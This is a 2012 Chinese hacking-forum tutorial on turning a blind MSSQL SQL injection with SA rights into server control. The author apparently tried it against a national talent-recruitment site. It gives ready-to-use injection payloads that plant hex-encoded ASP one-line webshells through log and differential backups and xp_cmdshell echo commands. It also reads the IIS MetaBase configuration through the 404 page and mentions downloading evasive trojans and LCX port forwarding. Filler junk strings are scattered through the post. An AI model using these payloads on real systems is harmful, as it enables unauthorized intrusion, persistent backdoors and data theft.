中国网络渗透测试联盟

标题: sa权限的教程. [打印本页]
作者: admin    时间: 2012-9-15 14:30
标题: sa权限的教程.
————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————
! R; C% ^/ C: S' p7 v% N! V
9 {. J- ^- M& v9 w/ v0 v2 R0 m( {- P% u
                                                             欢迎高手访问指导,欢迎新手朋友交流学习。
: V9 M  D/ A2 S  q* ~: {
/ D% K* ]" {, a0 a9 F/ r; Y0 b                                                                 
3 M& h/ j" |( y) j$ P! A$ p) v) |                                                                 7 {9 k$ J# O' s
                                                                  论坛: http://www.90team.net/* q' [4 G. c. j( R/ k
9 A( W+ {* I' [  h* Q9 f+ U

9 }0 `2 C$ d/ K
( U! M( m3 P$ R) J( w* t. @友情检测国家人才网) a1 H0 _; z: {1 n
' \( S: N- v- k9 G3 u4 d

, R5 j1 x" A/ g: w内容:MSSQL注入SA权限不显错模式下的入侵
" I5 Y& e* B( I$ n! |2 @) |6 I0 C8 H$ l8 ~! ?( X6 w7 F

8 M6 d# [% q5 u  f; T一般新手扫到不显错的SA(systemadmin)的注入点时,虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了,今天我给大家演示下如何利用。方法很简单大家看操作。0 C" L, v7 S, n. @1 O) P

0 c  {$ U9 q5 b- [6 t6 s  p8 `我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。
& C+ K$ {  s3 i3 [) A) r6 x; E& R- P4 Q/ J3 v# _
: p6 e8 m/ |$ \/ e0 a  Y9 p8 c
这里的主机环境:MSSQL+JSP 权限为不显错的SA,支持多行执行 xp_cmdshell存活 服务器处于内网,WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003,IIS,404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。; x2 }! S0 B  c3 T" z
( M% P( @7 u3 I7 M4 Q8 n
思路:" G% b3 F4 m5 t  C' f5 o# j
  Z2 X) y3 [: }  c4 l/ S- t
首先:# c. i. Q! w9 Z9 X3 d, C2 A; G
: S3 ^+ |( M/ \( R, O3 u
通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面,然后访问WEB站点的一个不存在的目录得到命令执行结果,刺探服务器信息。
1 d4 l/ U/ `- a+ |2 l# L2 g8 ^. Y5 o. G$ e3 D2 R% X4 S2 _
1.日志备份获得Webshell
7 g% w0 |( \" z
: `, l3 p7 v' L) l/ x2.数据库差异备份获得Webshell
2 g% O: F1 i9 Q0 n% K1 T  h
$ _% T; q+ M2 d/ O, J* P4.直接下载免杀远控木马。! I  o& H1 v, g+ f

1 h# L6 l5 ^9 T$ |/ o5 b5.直接下载LCX将服务器端口转发出来8 D2 ?3 M2 R. d. ^
9 p; y! V% n) M- ~$ |
6.通过XP_CMDSHELL 执行命令读取iis配置文件(C:\Windows\system32\inetsrv\MetaBase.xml )分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。% H+ f: y5 P, A. j
. A3 y( R: ?, U) p( d
$ P7 {" G$ [2 U8 S# v5 ~

6 h6 T# j) M+ x* X, ~# F在这里我就不浪费大家时间了,我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了,
4 p! D5 H* Q( q; m6 e/ W+ j
1 a9 m. j* V- h4 d  K我直接演示后面一个方法0 W! C- c% v% ]6 F' s. K9 b& R

  K( b! s+ n  ^( C* s7 f1 |$ V; j' e, f; l# t
分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL 9 [8 p! c5 ^7 ~3 w- Z
1 U9 o7 L, ~/ d$ a+ X, f+ Q* F; w
; ]% `& g: E$ q% L& ?

7 j  F  z' I1 j# ], i* x3 O
: L- t2 ^7 g9 ], \2 g- B  a# D3 u◆日志备份:' h7 d& \7 V1 c
8 r4 F- ?& N) Q* }- O
. \8 A9 ^" o$ I8 T
1. 进行初始备份
% a2 A3 u+ `: K; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--* R# w% g# O3 t& Q: O- s0 t% _
9 I5 ~+ M  P, B+ s( J
2. 插入数据. q7 n9 N1 R3 x7 F
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
* \; \4 W  ]% \3 Z5 j6 i/ {( A" ?5 z& L
0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>- z, m$ ]" R% B
  5 s. d/ R! v( F, l# e/ m
3. 备份并获得文件,删除临时表
+ ~; ]. _  K0 }7 F, ~# E- |/ S' O;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--# Z% Z6 O6 X) U% d6 h' p  w  t

: b/ n. N4 X1 E7 `8 U& j: |6 d- y( M/ y4 V
- p; `$ q1 h$ @9 `
◆数据库差异备份
: f5 A( x2 b+ ~0 ^2 f
/ U- ?- T2 y& Q: b9 k  O(1. 进行差异备份准备工作3 M: N' g* x9 r. C

; B8 D& K" F; s% Y. ?& A;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--
4 q4 g& R) e( Y6 Q6 d: m9 R) s3 R! O- R4 s6 x* M' w* y. S
上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码1 v. C! h! a2 C# l

" E% N: L: s( y7 j- C- d/ ~' Y( z
" \# R$ U, N' T$ V(2. 将数据写入到数据库& X% I9 c8 i4 W
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
% E  ]% W/ L2 r3 N- b0 ^) ~6 m$ ?5 o( u4 T- b8 C5 h* U5 A4 e5 C' A
0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>( _- n. l6 ~  d. y- n9 u

1 W+ I+ l$ {2 @) Y$ d6 {: s7 v# |4 @3. 备份数据库并清理临时文件9 `; _, I# j* d+ t7 I

- X  J" X8 k; b9 ~7 U+ V8 ?& u+ w;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--1 c1 U5 P  z2 ]
/ Y9 F# Z+ v) H9 w
0x633A5C746573742E617370  为 c:\test.asp  删除临时文件 7 _1 L0 k" z& d# r/ S" B- q

# I7 d- W8 R6 o0 i; s
) T+ C; l2 e3 {/ y8 `# V! d' O3 v' {+ v9 P/ C7 u+ x
用^转义字符来写ASP(一句话木马)文件的方法:   $ N# P# p- l: f% `2 N

8 k) ]- d2 {; M! K7 q5 a' N" O1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--
' x2 P, H( x) a' Y- g+ u  n% P2 _# M+ f* n/ g" L8 g
2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp
! H' K& ^8 T7 ]( T! h3 c3 ^) G. Q8 f
读取IIS配置信息获取web路径" b, `( u( w" u9 S& W

- J# M' N3 Y# z1 W+ H8 n     
& i) c, v2 |/ u0 `+ b5 I: O' x     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--
& U7 B8 _( k. m/ \! O. f+ ?" o5 o8 f) P  @
执行命令
; w8 t* N6 b7 R# B! _1 H) _     
1 f' a2 \% s" W1 n, E     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--
. D' w* j$ D5 a7 r/ c! Q) l8 J6 h" L, [  R2 [! p
2 c  j6 c* I- W3 o% O5 [5 b

0 X3 [- Z) F! u! @6 ^. m& E8 x2 W
" h% C4 Q3 T/ a8 k
* ~/ ?: @2 f- g4 `6 ^  H6 o" y5 Y  ^, [5 e  s' V

3 G: B0 m$ A  x, i- b6 x- |
2 X9 t0 f& |( D+ {+ n; U  t) p1 N2 E1 I/ G; X* _

( T, @  p: }: P. K% }) w! ~. K  m% t1 J2 F3 e& h

) r! F! l; {+ {! g0 j  U- {; N0 a1 U! V+ V+ Y

% a% N, v" A0 }9 v* W" X; s$ R& Z
" i: N; m2 L9 I" y) P0 _9 T" b" c# r: D1 j; l

9 Z$ j! r, ^% W0 O9 {
" `+ P; s" b: t# n: G% Z
! J8 A4 |6 N0 L0 Y
# {- ~. |  b: K
; w9 j$ p; [! X* K7 m1 U! ]. C& N0 Q% b- v: B, @# A2 g# G0 d

- B* b6 m9 H8 X: f$ k& v; f) q0 D/ q" E
* y8 Y% e6 {! w' U& `& s  R/ U

$ C7 H, r$ }1 R- W, ?  e: F  |+ {* ~

- s& e& _( ?$ r5 W
+ o* ^1 p8 F1 k% W! y% O. B- x0 Q0 X* g; |6 e
- V) w; @& `6 M5 E( F
5 s3 q. ]4 R4 \3 e9 O5 h

  _4 }' z% O/ |5 x/ f# p
# f  N8 a( F- c, \* S9 u' ?
4 ^+ j4 `7 w2 ~( f* V! ]! q3 I4 ~. x

' Y' y' p2 U* c/ y; J
; \# F/ e+ i+ c& i: M$ n/ C
9 k# R' g' x( x' ?
% I7 G5 k$ G, z) D5 u* b" {- Z; S1 P# _0 U0 ]

3 }" D' j7 q, a+ b( x& D8 n& H0 U9 y

: a5 O( [; ]5 `5 ]* Z) |  |% v+ D6 n+ X
" b1 x/ e( k- }; X8 Q
- ~( C" Q( W+ Z  T. I) n
1 K& A: {3 H9 l$ _/ [
; G% d$ e& |4 ]" \) C6 I2 G



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2